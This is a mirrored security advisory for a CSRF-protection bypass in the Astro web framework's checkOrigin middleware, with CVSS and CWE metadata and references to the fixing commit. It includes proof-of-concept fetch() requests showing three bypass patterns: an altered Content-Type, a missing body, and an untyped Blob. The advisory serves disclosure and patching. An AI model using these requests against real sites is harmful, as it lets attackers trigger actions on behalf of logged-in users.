GHSA-c4pw-33h3-35xw
Suggest an improvement- Source
- https://github.com/advisories/GHSA-c4pw-33h3-35xw
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-c4pw-33h3-35xw/GHSA-c4pw-33h3-35xw.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-c4pw-33h3-35xw
- Aliases
- Published
- 2024-12-18T15:02:37Z
- Modified
- 2024-12-18T21:52:48Z
- Severity
-
- 5.9 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N CVSS Calculator
- Summary
- Atro CSRF Middleware Bypass (security.checkOrigin)
- Details
-
Summary
A bug in Astro’s CSRF-protection middleware allows requests to bypass CSRF checks.
Details
When the
security.checkOriginconfiguration option is set totrue, Astro middleware will perform a CSRF check. (Source code: https://github.com/withastro/astro/blob/6031962ab5f56457de986eb82bd24807e926ba1b/packages/astro/src/core/app/middlewares.ts)For example, with the following Astro configuration:
// astro.config.mjs import { defineConfig } from 'astro/config'; import node from '@astrojs/node'; export default defineConfig({ output: 'server', security: { checkOrigin: true }, adapter: node({ mode: 'standalone' }), });A request like the following would be blocked if made from a different origin:
// fetch API or <form action="https://test.example.com/" method="POST"> fetch('https://test.example.com/', { method: 'POST', credentials: 'include', body: 'a=b', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, }); // => Cross-site POST form submissions are forbiddenHowever, a vulnerability exists that can bypass this security.
Pattern 1: Requests with a semicolon after the
Content-TypeA semicolon-delimited parameter is allowed after the type in
Content-Type.Web browsers will treat a
Content-Typesuch asapplication/x-www-form-urlencoded; abcas a simple request and will not perform preflight validation. In this case, CSRF is not blocked as expected.fetch('https://test.example.com', { method: 'POST', credentials: 'include', body: 'test', headers: { 'Content-Type': 'application/x-www-form-urlencoded; abc' }, }); // => Server-side functions are executed (Response Code 200).Pattern 2: Request without
Content-TypeheaderThe
Content-Typeheader is not required for a request. The following examples are sent without aContent-Typeheader, resulting in CSRF.// Pattern 2.1 Request without body fetch('http://test.example.com', { method: 'POST', credentials: 'include' }); // Pattern 2.2 Blob object without type fetch('https://test.example.com', { method: 'POST', credentials: 'include', body: new Blob(['a=b'], {}), });Impact
Bypass CSRF protection implemented with CSRF middleware.
[!Note] Even with
credentials: 'include', browsers may not send cookies due to third-party cookie blocking. This feature depends on the browser version and settings, and is for privacy protection, not as a CSRF measure. - Database specific
{ "nvd_published_at": "2024-12-18T21:15:08Z", "cwe_ids": [ "CWE-352" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2024-12-18T15:02:37Z" }- References
-
- https://github.com/withastro/astro/security/advisories/GHSA-c4pw-33h3-35xw
- https://nvd.nist.gov/vuln/detail/CVE-2024-56140
- https://github.com/withastro/astro/commit/e7d14c374b9d45e27089994a4eb72186d05514de
- https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests
- https://github.com/withastro/astro
- https://github.com/withastro/astro/blob/6031962ab5f56457de986eb82bd24807e926ba1b/packages/astro/src/core/app/middlewares.ts
Affected packages
npm / astro
Package
- Name
- astro
- View open source insights on deps.dev
- Purl
- pkg:npm/astro